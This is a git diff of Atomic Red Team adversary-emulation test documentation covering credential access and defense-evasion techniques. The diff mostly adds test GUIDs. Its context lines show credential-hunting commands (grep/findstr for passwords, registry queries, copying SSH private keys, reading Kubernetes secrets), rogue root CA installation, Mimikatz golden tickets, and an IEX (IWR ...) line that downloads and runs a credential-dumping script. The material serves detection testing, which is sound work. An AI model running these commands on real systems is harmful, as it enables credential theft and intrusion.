## Atomic Test #1 - Mimikatz Kerberos Ticket Attack -Similar to PTH, but attacking Kerberos +auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098 + +Similar to PTH, but attacking Kerberos **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | username | string | Administrator| | domain | domain | string | atomic.local| @@ -47,7 +49,7 @@ Similar to PTH, but attacking Kerberos ##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} +if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1552.001/T1552.001.md b/atomics/T1552.001/T1552.001.md index 33589071..edb84410 100644 --- a/atomics/T1552.001/T1552.001.md +++ b/atomics/T1552.001/T1552.001.md @@ -22,8 +22,10 @@ In cloud and/or containerized environments, authenticated user and service accou
## Atomic Test #1 - Extract Browser and System credentials with LaZagne -[LaZagne Source](https://github.com/AlessandroZ/LaZagne) +auto_generated_guid: 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79 + +[LaZagne Source](https://github.com/AlessandroZ/LaZagne) **Supported Platforms:** macOS @@ -46,15 +48,17 @@ python2 laZagne.py all
## Atomic Test #2 - Extract passwords with grep -Extracting credentials from files +auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4 + +Extracting credentials from files **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_path | Path to search | String | /| @@ -75,8 +79,10 @@ grep -ri password #{file_path}
## Atomic Test #3 - Extracting passwords with findstr -Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed. +auto_generated_guid: 0e56bf29-ff49-4ea5-9af4-3b81283fd513 + +Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed. **Supported Platforms:** Windows @@ -100,9 +106,11 @@ ls -R | select-string -Pattern password
## Atomic Test #4 - Access unattend.xml + +auto_generated_guid: 367d4004-5fc0-446d-823f-960c74ae52c3 + Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process. - **Supported Platforms:** Windows @@ -126,8 +134,10 @@ type C:\Windows\Panther\Unattend\unattend.xml
## Atomic Test #5 - Find and Access Github Credentials -This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found. +auto_generated_guid: da4f751a-020b-40d7-b9ff-d433b7799803 + +This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found. **Supported Platforms:** macOS, Linux diff --git a/atomics/T1552.002/T1552.002.md b/atomics/T1552.002/T1552.002.md index ceefc502..4dcc1d70 100644 --- a/atomics/T1552.002/T1552.002.md +++ b/atomics/T1552.002/T1552.002.md @@ -17,8 +17,10 @@ Example commands to find Registry keys related to password information: (Citatio
## Atomic Test #1 - Enumeration for Credentials in Registry -Queries to enumerate for credentials in the Registry. Upon execution, any registry key containing the word "password" will be displayed. +auto_generated_guid: b6ec082c-7384-46b3-a111-9a9b8b14e5e7 + +Queries to enumerate for credentials in the Registry. Upon execution, any registry key containing the word "password" will be displayed. **Supported Platforms:** Windows @@ -42,9 +44,11 @@ reg query HKCU /f password /t REG_SZ /s
## Atomic Test #2 - Enumeration for PuTTY Credentials in Registry + +auto_generated_guid: af197fd7-e868-448e-9bd5-05d1bcd9d9e5 + Queries to enumerate for PuTTY credentials in the Registry. PuTTY must be installed for this test to work. If any registry entries are found, they will be displayed. - **Supported Platforms:** Windows diff --git a/atomics/T1552.003/T1552.003.md b/atomics/T1552.003/T1552.003.md index 61a5049e..eecb4da5 100644 --- a/atomics/T1552.003/T1552.003.md +++ b/atomics/T1552.003/T1552.003.md @@ -10,15 +10,17 @@
## Atomic Test #1 - Search Through Bash History -Search through bash history for specifice commands we want to capture +auto_generated_guid: 3cfde62b-7c33-4b26-a61e-755d6131c8ce + +Search through bash history for specifice commands we want to capture **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | ~/loot.txt| | bash_history_grep_args | grep arguments that filter out specific commands we want to capture | Path | -e '-p ' -e 'pass' -e 'ssh'| diff --git a/atomics/T1552.004/T1552.004.md b/atomics/T1552.004/T1552.004.md index d9eb8d26..2f1e6642 100644 --- a/atomics/T1552.004/T1552.004.md +++ b/atomics/T1552.004/T1552.004.md @@ -22,9 +22,11 @@ Some private keys require a password or passphrase for operation, so an adversar
## Atomic Test #1 - Private Keys + +auto_generated_guid: 520ce462-7ca7-441e-b5a5-f8347f632696 + Find private keys on the Windows file system. File extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .asc - **Supported Platforms:** Windows @@ -47,15 +49,17 @@ dir c:\ /b /s .key | findstr /e .key
## Atomic Test #2 - Discover Private SSH Keys -Discover private SSH keys on a macOS or Linux system. +auto_generated_guid: 46959285-906d-40fa-9437-5a439accd878 + +Discover private SSH keys on a macOS or Linux system. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | search_path | Path where to start searching from. | path | /| | output_file | Output file containing locations of SSH key files | path | /tmp/keyfile_locations.txt| @@ -82,15 +86,17 @@ rm #{output_file}
## Atomic Test #3 - Copy Private SSH Keys with CP -Copy private SSH keys on a Linux system to a staging folder using the `cp` command. +auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3 + +Copy private SSH keys on a Linux system to a staging folder using the `cp` command. **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | search_path | Path where to start searching from. | path | /| | output_folder | Output folder containing copies of SSH private key files | path | /tmp/art-staging| @@ -118,15 +124,17 @@ rm #{output_folder}
## Atomic Test #4 - Copy Private SSH Keys with rsync -Copy private SSH keys on a Linux or macOS system to a staging folder using the `rsync` command. +auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a + +Copy private SSH keys on a Linux or macOS system to a staging folder using the `rsync` command. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | search_path | Path where to start searching from. | path | /| | output_folder | Output folder containing copies of SSH private key files | path | /tmp/art-staging| diff --git a/atomics/T1552.006/T1552.006.md b/atomics/T1552.006/T1552.006.md index 1fea602a..dbbe2d71 100644 --- a/atomics/T1552.006/T1552.006.md +++ b/atomics/T1552.006/T1552.006.md @@ -23,8 +23,10 @@ On the SYSVOL share, adversaries may use the following command to enumerate pote
## Atomic Test #1 - GPP Passwords (findstr) -Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux. +auto_generated_guid: 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f + +Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux. **Supported Platforms:** Windows @@ -45,7 +47,7 @@ findstr /S cpassword %logonserver%\sysvol\*.xml ##### Description: Computer must be domain joined ##### Check Prereq Commands: ```powershell -if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} +if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -59,19 +61,21 @@ Write-Host Joining this computer to a domain must be done manually
## Atomic Test #2 - GPP Passwords (Get-GPPPassword) + +auto_generated_guid: e9584f82-322c-474a-b831-940fd8b4455c + Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This test is intended to be run from a domain joined workstation, not on the Domain Controller itself. The Get-GPPPasswords.ps1 executed during this test can be obtained using the get-prereq_commands. Successful test execution will either display the credentials found in the GPP files or indicate "No preference files found". - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | gpp_script_url | URL of the Get-GPPPassword PowerShell Script | url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/87630cac639f29c2adcb163f661f02890adf4bdd/Exfiltration/Get-GPPPassword.ps1| | gpp_script_path | Path to the Get-GPPPassword PowerShell Script | Path | PathToAtomicsFolder\T1552.006\src\Get-GPPPassword.ps1| @@ -92,7 +96,7 @@ Get-GPPPassword -Verbose ##### Description: Get-GPPPassword PowerShell Script must exist at #{gpp_script_path} ##### Check Prereq Commands: ```powershell -if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1 } +if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -102,7 +106,7 @@ Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}" ##### Description: Computer must be domain joined ##### Check Prereq Commands: ```powershell -if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} +if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1552.007/T1552.007.md b/atomics/T1552.007/T1552.007.md index 150c669b..d0d3f03b 100644 --- a/atomics/T1552.007/T1552.007.md +++ b/atomics/T1552.007/T1552.007.md 
@@ -14,15 +14,17 @@ An adversary may access the Docker API to collect logs that contain credentials
## Atomic Test #1 - ListSecrets -A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services. +auto_generated_guid: 43c3a49d-d15c-45e6-b303-f6e177e44a9a + +A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | namespace | K8s namespace to list | String | default| @@ -43,8 +45,10 @@ kubectl get secrets -n #{namespace}
## Atomic Test #2 - Cat the contents of a Kubernetes service account token file -Access the Kubernetes service account access token stored within a container in a cluster. +auto_generated_guid: 788e0019-a483-45da-bcfe-96353d46820f + +Access the Kubernetes service account access token stored within a container in a cluster. **Supported Platforms:** Linux @@ -69,7 +73,7 @@ kubectl --context kind-atomic-cluster delete pod atomic-pod ##### Description: Verify docker is installed. ##### Check Prereq Commands: ```sh -which docker +which docker ``` ##### Get Prereq Commands: ```sh @@ -78,7 +82,7 @@ if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt ##### Description: Verify docker service is running. ##### Check Prereq Commands: ```sh -sudo systemctl status docker +sudo systemctl status docker ``` ##### Get Prereq Commands: ```sh @@ -87,7 +91,7 @@ sudo systemctl start docker ##### Description: Verify kind is in the path. ##### Check Prereq Commands: ```sh -which kind +which kind ``` ##### Get Prereq Commands: ```sh @@ -98,7 +102,7 @@ mv kind /usr/bin/kind ##### Description: Verify kind-atomic-cluster is created ##### Check Prereq Commands: ```sh -sudo kind get clusters +sudo kind get clusters ``` ##### Get Prereq Commands: ```sh @@ -107,7 +111,7 @@ sudo kind create cluster --name atomic-cluster ##### Description: Verify kubectl is in path ##### Check Prereq Commands: ```sh -which kubectl +which kubectl ``` ##### Get Prereq Commands: ```sh @@ -118,7 +122,7 @@ mv kubectl /usr/bin/kubectl ##### Description: Verify atomic-pod is running. ##### Check Prereq Commands: ```sh -kubectl --context kind-atomic-cluster get pods |grep atomic-pod +kubectl --context kind-atomic-cluster get pods |grep atomic-pod ``` ##### Get Prereq Commands: ```sh diff --git a/atomics/T1553.001/T1553.001.md b/atomics/T1553.001/T1553.001.md index 93bc43cf..380c0107 100644 --- a/atomics/T1553.001/T1553.001.md +++ b/atomics/T1553.001/T1553.001.md 
@@ -14,15 +14,17 @@ In typical operation, a file will be downloaded from the internet and given a qu
## Atomic Test #1 - Gatekeeper Bypass -Gatekeeper Bypass via command line +auto_generated_guid: fb3d46c6-9480-4803-8d7d-ce676e1f1a9b + +Gatekeeper Bypass via command line **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | app_path | Path to app to be used | Path | myapp.app| diff --git a/atomics/T1553.004/T1553.004.md b/atomics/T1553.004/T1553.004.md index c17ef4a6..182abaad 100644 --- a/atomics/T1553.004/T1553.004.md +++ b/atomics/T1553.004/T1553.004.md @@ -26,15 +26,17 @@ In macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -
## Atomic Test #1 - Install root CA on CentOS/RHEL -Creates a root CA with openssl +auto_generated_guid: 9c096ec4-fd42-419d-a762-d64cc950627e + +Creates a root CA with openssl **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | cert_filename | Path of the CA certificate we create | Path | rootCA.crt| | key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key| @@ -65,15 +67,17 @@ fi
## Atomic Test #2 - Install root CA on Debian/Ubuntu -Creates a root CA with openssl +auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff + +Creates a root CA with openssl **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | cert_filename | CA file name | Path | rootCA.crt| | key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key| @@ -94,7 +98,7 @@ echo sudo update-ca-certificates ##### Description: Verify the certificate exists. It generates if not on disk. ##### Check Prereq Commands: ```sh -if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; +if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```sh @@ -109,15 +113,17 @@ openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=U
## Atomic Test #3 - Install root CA on macOS -Creates a root CA with openssl +auto_generated_guid: cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 + +Creates a root CA with openssl **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | cert_filename | CA file name | Path | rootCA.crt| | key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key| @@ -137,7 +143,7 @@ sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.key ##### Description: Verify the certificate exists. It generates if not on disk. ##### Check Prereq Commands: ```sh -if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; +if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```sh @@ -152,15 +158,17 @@ openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=U
## Atomic Test #4 - Install root CA on Windows -Creates a root CA with Powershell +auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1 + +Creates a root CA with Powershell **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | pfx_path | Path of the certificate | Path | rootCA.cer| @@ -191,7 +199,7 @@ catch { ##### Description: Verify the certificate exists. It generates if not on disk. ##### Check Prereq Commands: ```powershell -if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } +if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -207,15 +215,17 @@ Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item
## Atomic Test #5 - Install root CA on Windows with certutil -Creates a root CA with certutil +auto_generated_guid: 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f + +Creates a root CA with certutil **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | pfx_path | Path of the certificate | Path | $env:Temp\rootCA2.cer| @@ -240,7 +250,7 @@ Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | ##### Description: Certificate must exist at specified location (#{pfx_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } +if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1553.005/T1553.005.md b/atomics/T1553.005/T1553.005.md index f80a754a..fc2bed9c 100644 --- a/atomics/T1553.005/T1553.005.md +++ b/atomics/T1553.005/T1553.005.md @@ -14,15 +14,17 @@ Adversaries may abuse container files such as compressed/archive (.arj, .gzip) a
## Atomic Test #1 - Mount ISO image -Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ +auto_generated_guid: 002cca30-4778-4891-878a-aaffcfa502fa + +Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | path_of_iso | Path to ISO file | path | PathToAtomicsFolder\T1553.005\bin\T1553.005.iso| @@ -45,7 +47,7 @@ Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null ##### Description: T1553.005.iso must exist on disk at specified location (#{path_of_iso}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} +if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -60,17 +62,19 @@ Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/
## Atomic Test #2 - Mount an ISO image and run executable from the ISO + +auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc + Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing "Hello, World!". ISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/, - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | path_of_iso | Path to ISO file | path | PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso| @@ -96,7 +100,7 @@ Stop-process -name "hello" -Force -ErrorAction ignore ##### Description: FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} +if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1555.001/T1555.001.md b/atomics/T1555.001/T1555.001.md index 4639ef46..bdc572de 100644 --- a/atomics/T1555.001/T1555.001.md +++ b/atomics/T1555.001/T1555.001.md @@ -12,6 +12,9 @@ To manage their credentials, users have to use additional credentials to access
## Atomic Test #1 - Keychain + +auto_generated_guid: 1864fdec-ff86-4452-8c30-f12507582a93 + ### Keychain Files ~/Library/Keychains/ @@ -23,14 +26,13 @@ To manage their credentials, users have to use additional credentials to access [Security Reference](https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man1/security.1.html) [Keychain dumper](https://github.com/juuso/keychaindump) - **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | cert_export | Specify the path of the certificates to export. | path | /tmp/certs.pem| diff --git a/atomics/T1555.003/T1555.003.md b/atomics/T1555.003/T1555.003.md index c246dec0..b460c84c 100644 --- a/atomics/T1555.003/T1555.003.md +++ b/atomics/T1555.003/T1555.003.md @@ -22,19 +22,21 @@ After acquiring credentials from web browsers, adversaries may attempt to recycl
## Atomic Test #1 - Run Chrome-password Collector + +auto_generated_guid: 8c05b133-d438-47ca-a630-19cc464c4622 + A modified sysinternals suite will be downloaded and staged. The Chrome-password collector, renamed accesschk.exe, will then be executed from #{file_path}. Successful execution will produce stdout message stating "Copying db ... passwordsDB DB Opened. statement prepare DB connection closed properly". Upon completion, final output will be a file modification of $env:TEMP\sysinternals\passwordsdb. Adapted from [MITRE ATTACK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d.yml) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_path | File path for modified Sysinternals | String | $env:TEMP| @@ -58,7 +60,7 @@ Remove-Item #{file_path}\Sysinternals -Force -Recurse -ErrorAction Ignore ##### Description: Modified Sysinternals must be located at #{file_path} ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_path}\SysInternals) {exit 0} else {exit 1} +if (Test-Path #{file_path}\SysInternals) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -75,17 +77,19 @@ Remove-Item #{file_path}\Modified-SysInternalsSuite.zip -Force
## Atomic Test #2 - Search macOS Safari Cookies + +auto_generated_guid: c1402f7b-67ca-43a8-b5f3-3143abedc01b + This test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware. Upon successful execution, MacOS shell will cd to `~/Libraries/Cookies` and grep for `Cookies.binarycookies`. - **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | search_string | String to search Safari cookies to find. | string | coinbase| @@ -107,16 +111,18 @@ grep -q "#{search_string}" "Cookies.binarycookies"
## Atomic Test #3 - LaZagne - Credentials from Browser + +auto_generated_guid: 9a2915b3-3954-4cce-8c76-00fbf4dbd014 + The following Atomic test utilizes [LaZagne](https://github.com/AlessandroZ/LaZagne) to extract passwords from browsers on the Windows operating system. LaZagne is an open source application used to retrieve passwords stored on a local computer. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | lazagne_path | Path to LaZagne | Path | PathToAtomicsFolder\T1555.003\bin\LaZagne.exe| @@ -135,7 +141,7 @@ LaZagne is an open source application used to retrieve passwords stored on a loc ##### Description: LaZagne.exe must exist on disk at specified location (#{lazagne_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{lazagne_path}) {exit 0} else {exit 1} +if (Test-Path #{lazagne_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1555/T1555.md b/atomics/T1555/T1555.md index a1251039..3e333580 100644 --- a/atomics/T1555/T1555.md +++ b/atomics/T1555/T1555.md @@ -14,9 +14,11 @@
## Atomic Test #1 - Extract Windows Credential Manager via VBA + +auto_generated_guid: 234f9b7c-b53d-4f32-897b-b880a6c9ea7b + This module will extract the credentials found within the Windows credential manager and dump them to $env:TEMP\windows-credentials.txt - **Supported Platforms:** Windows @@ -48,7 +50,7 @@ try { $process = "winword" Stop-Process -Name $process exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -62,8 +64,10 @@ Write-Host "You will need to install Microsoft Word manually to meet this requir
## Atomic Test #2 - Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] -This module will extract the credentials from Windows Credential Manager +auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3 + +This module will extract the credentials from Windows Credential Manager **Supported Platforms:** Windows @@ -86,8 +90,10 @@ IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/
## Atomic Test #3 - Dump credentials from Windows Credential Manager With PowerShell [web Credentials] -This module will extract the credentials from Windows Credential Manager +auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240 + +This module will extract the credentials from Windows Credential Manager **Supported Platforms:** Windows diff --git a/atomics/T1556.002/T1556.002.md b/atomics/T1556.002/T1556.002.md index a8dcd535..807c98bc 100644 --- a/atomics/T1556.002/T1556.002.md +++ b/atomics/T1556.002/T1556.002.md @@ -14,15 +14,17 @@ Adversaries can register malicious password filters to harvest credentials from
## Atomic Test #1 - Install and Register Password Filter DLL -Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. +auto_generated_guid: a7961770-beb5-4134-9674-83d7e1fa865c + +Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_dll | Path to DLL to be installed and registered | Path | PathToAtomicsFolder\T1556.002\src\AtomicPasswordFilter.dll| @@ -46,7 +48,7 @@ Restart-Computer -Confirm ##### Description: AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{input_dll}) {exit 0} else {exit 1} +if (Test-Path #{input_dll}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1558.001/T1558.001.md b/atomics/T1558.001/T1558.001.md index 26058d91..ba58dac9 100644 --- a/atomics/T1558.001/T1558.001.md +++ b/atomics/T1558.001/T1558.001.md @@ -14,17 +14,19 @@ The KDC service runs all on domain controllers that are part of an Active Direct
## Atomic Test #1 - Crafting golden tickets with mimikatz + +auto_generated_guid: 9726592a-dabc-4d4d-81cd-44070008b3af + Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the domain. This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769). The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain_sid | SID of the targeted domain, if you keep default it will automatically get the current domain SID | string | S-1-5-21-DEFAULT| | domain | Targeted domain FQDN | string | example.com| @@ -98,7 +100,7 @@ Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore ##### Check Prereq Commands: ```powershell $mimikatz_path = cmd /c echo #{mimikatz_path} -if (Test-Path $mimikatz_path) {exit 0} else {exit 1} +if (Test-Path $mimikatz_path) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1558.003/T1558.003.md b/atomics/T1558.003/T1558.003.md index 3dee6b3b..c33a6ec5 100644 --- a/atomics/T1558.003/T1558.003.md +++ b/atomics/T1558.003/T1558.003.md @@ -18,13 +18,15 @@ Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003)
## Atomic Test #1 - Request for service tickets + +auto_generated_guid: 3f987809-3681-43c8-bcd8-b3ff3a28533a + This test uses the Powershell Empire Module: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1 The following are further sources and credits for this attack: [Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/) [Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/) when executed successfully , the test displays available services with their hashes. If the testing domain doesn't have any service principal name configured, there is no output - **Supported Platforms:** Windows diff --git a/atomics/T1559.002/T1559.002.md b/atomics/T1559.002/T1559.002.md index 191c83d5..1e38d8cb 100644 --- a/atomics/T1559.002/T1559.002.md +++ b/atomics/T1559.002/T1559.002.md @@ -18,8 +18,10 @@ Microsoft Office documents can be poisoned with DDE commands (Citation: SensePos
## Atomic Test #1 - Execute Commands -Executes commands via DDE using Microsfot Word +auto_generated_guid: f592ba2a-e9e8-4d62-a459-ef63abd819fd + +Executes commands via DDE using Microsfot Word **Supported Platforms:** Windows @@ -48,8 +50,10 @@ The Field Code should now be displayed, change it to Contain the following:
## Atomic Test #2 - Execute PowerShell script via Word DDE -When the word document opens it will prompt the user to click ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script +auto_generated_guid: 47c21fb6-085e-4b0d-b4d2-26d72c3830b3 + +When the word document opens it will prompt the user to click ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script **Supported Platforms:** Windows @@ -72,6 +76,9 @@ start $PathToAtomicsFolder\T1559.002\bin\DDE_Document.docx
## Atomic Test #3 - DDEAUTO + +auto_generated_guid: cf91174c-4e74-414e-bec0-8d60a104d181 + TrustedSec - Unicorn - https://github.com/trustedsec/unicorn SensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ @@ -79,7 +86,6 @@ SensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-mswo Word VBA Macro [Dragon's Tail](https://github.com/redcanaryco/atomic-red-team/tree/master/ARTifacts/Adversary/Dragons_Tail) - **Supported Platforms:** Windows diff --git a/atomics/T1560.001/T1560.001.md b/atomics/T1560.001/T1560.001.md index c5559b4f..17ca1c97 100644 --- a/atomics/T1560.001/T1560.001.md +++ b/atomics/T1560.001/T1560.001.md @@ -26,16 +26,18 @@ Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS o
